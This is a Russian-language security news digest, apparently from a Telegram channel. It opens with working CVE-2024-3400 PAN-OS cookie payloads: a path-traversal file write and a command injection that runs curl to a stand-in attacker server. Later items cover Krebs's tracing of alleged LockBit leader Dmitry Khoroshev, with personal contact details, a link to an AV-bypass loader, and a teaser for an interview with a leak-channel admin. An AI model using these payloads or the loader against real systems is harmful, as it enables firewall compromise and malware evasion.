CVE-2024-3400 - внедрение команд ОС в функции PAN-OS

Если же говорить об эксплуатации :
В куках SESSID можно сделать os command injection

Запись файла

Cookie: SESSID=/../../../opt/panlogs/tmp/device\_telemetry/minute/hellothere

Os command injection же можно сделать вот так:

Cookie: SESSID=/../../../opt/panlogs/tmp/device\_telemetry/minute/hellothere`curl${IFS}http://<you\_server>`

Лидер LockBit Дмитрий Хорошев? ?**

На прошлой неделе США вместе с Великобританией и Австралией выдвинули обвинения и ввели санкции против Дмитрия  Хорошева, который, как полагают, является лидером атакующей группы LockBit.

Пользователь LockBitSupp оперативно отреагировал на претензии, заявив, что допустил ошибку и это был не он. Увидев заявление, Брайан Крабс решил разобраться в этом вопросе.

По данным DomainTools, адрес электронной почты sitedev5@yandex[.]ru» использовался для регистрации нескольких доменов, в том числе зарегистрированного на имя Хорошева бизнеса под названием «tkaner[.]com» (блог одежды).

В ходе поиска Constella Intelligence номера телефона, указанного в регистрационных документах Тканера, было обнаружено несколько официальных документов, подтверждающих право собственности на номер Дмитрия Хорошева.

Другой домен, зарегистрированный на этот номер телефона, «Stairwell[.]ru» (сайт, предлагающий деревянные лестницы), больше не активен. DomainTools сообщает, что этот домен в течение нескольких лет содержал имя «Дмитрий Ю Хорошев» и адрес электронной почты «pin@darktower[.]su».

По данным Constella Intelligence, этот адрес использовался в 2010 году для регистрации аккаунта Дмитрия Хоршева у хостинг-провайдера FirstVDS. Кроме того, Intel 471 обнаружил, что этот же адрес использовался русскоязычным участником форума под ником «Пин» на хакерском форуме Opensc, где «Пин» был особенно активен в 2012 году и много писал о проблемах с шифрованием данных. и обход механизмов безопасности Windows.

На форуме Античата форумчанин «Пин» рекомендовал связаться с ним по номеру ICQ 669316. По данным Intel 471, этот номер ICQ был зарегистрирован на форуме Zloy в апреле 2011 года под именем «NeroWolfe» с адресом «d.horochev@gmail». [ ]com» и IP-адрес из Воронежа (Россия).

Пользователь «NeroWolfe» также использовал те же пароли, что и «Stairwell(.)ru», и зарегистрировался более чем на десяти других киберфорумах в период с 2011 по 2015 год. «NeroWolfe» представлял себя системным администратором и программистом C++ и предлагал услуги по установке вредоносного ПО и разработке новых способов взлома веб-браузеров.

В 2019 году пользователь под псевдонимом «Путинкраб» начал предлагать исходный код программы-вымогателя на таких киберфорумах, как XSS, Exploit и UFOLabs. В апреле 2019 года он запустил партнёрскую программу с распределением прибыли 20/80 в пользу партнёров. Последний пост пользователя с этим ником был опубликован 23 августа 2019 года.

Минюст сообщает, что спустя пять месяцев был официально запущен партнерский проект LockBit, предположительно возглавляемый Хорошевым, но под псевдонимом «LockBitSupp». Кроме того, оригинальная программа-вымогатель LockBit была написана на языке программирования C, в котором NeroWolfe был экспертом.

Пока не доказано, что Хорошев определенно является «LockBitSupp», но вся его деятельность на протяжении многих лет указывает на глубокую причастность к различным схемам киберпреступлений, включая ботнеты, кражу данных и вредоносное ПО. Хорошев продемонстрировал мастерство в криптографии и планировании преступлений, что явно сделало его востребованным в индустрии RaaS.

В феврале 2024 года ФБР проникло в инфраструктуру LockBit в Луке в рамках операции «Кронос». Учитывая обвинения, выдвинутые против Хорошева и других членов LockBit, власти, вероятно, располагают обширной информацией о деятельности группы.

Кроме того, вскоре после обвинений против Хорошева несколько независимых исследователей безопасности обнаружили десятки кредитных карт и банковских счетов, связанных с ним. Все они, безусловно, впечатляют своими суммами.

https://github.com/Cipher7/ChaiLdr

?? Loader для обхода AV
-----
?? Loader for bypass AV

GitHub

GitHub - Cipher7/ChaiLdr: AV bypass while you sip your Chai!

AV bypass while you sip your Chai! Contribute to Cipher7/ChaiLdr development by creating an account on GitHub.

?? Хотите интервью с админом одного из крупнейших каналов, ориентирующийся на сливы баз данных?
----
?? Want an interview with the admin of one of the biggest channels focusing on database leaks?